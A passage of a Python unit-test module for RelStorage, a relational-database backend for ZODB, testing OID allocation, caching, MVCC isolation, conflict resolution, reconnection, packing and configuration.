db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
print ("##############################")
l = len(self._storage)
print (l)
print ("##############################")
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
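# (Truth-testing r2['alpha'] below activates the ghost, which is why _p_changed moves
# from None to 0 between the assertions.)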
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['gamma'], but due to MVCC,
# it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
# make root['gamma'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = TransactionMetaData()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
# Once again, history free automatically invalidated.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
# the storage directly. NOTE: The load connection must be open
# to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
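# (The loop below spins until the clock advances, so packtime ends up strictly greater than `now`,
# presumably to avoid edge cases where the pack time exactly equals the last commit's timestamp.)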
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
# Choose the pack time to be that last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
# on whether the accelerated implementation is in use. Also, the pure-Python
# version on PyPy can raise IndexError.
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
# The after completion method, which can only be called
# outside of 2-phase commit, is otherwise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
# pylint:disable=no-value-for-parameter
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
ADAPTER=self.get_adapter_zconfig()
)
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
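# The storage API exercised below (behaviour inferred from the assertions in
# these tests): record_iternext(token) returns an (oid, tid, data, next_token)
# tuple. Pass token=None to start from the lowest OID and keep feeding
# next_token back in until it comes back as None.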
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
# Now, add some additional revisions. This proves that we iterate over the latest records,
# not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
# (0, 1, 2) by default, or, e.g., (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
class AbstractRSZodbConvertTests(StorageCreatingMixin,
ZlibWrappedFSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
# Zap the storage
self.make_storage(zap=True).close()
def make_storage(self, zap=True): # pylint:disable=arguments-differ
if self.relstorage_name == 'source':
meth = self._create_src_storage
else:
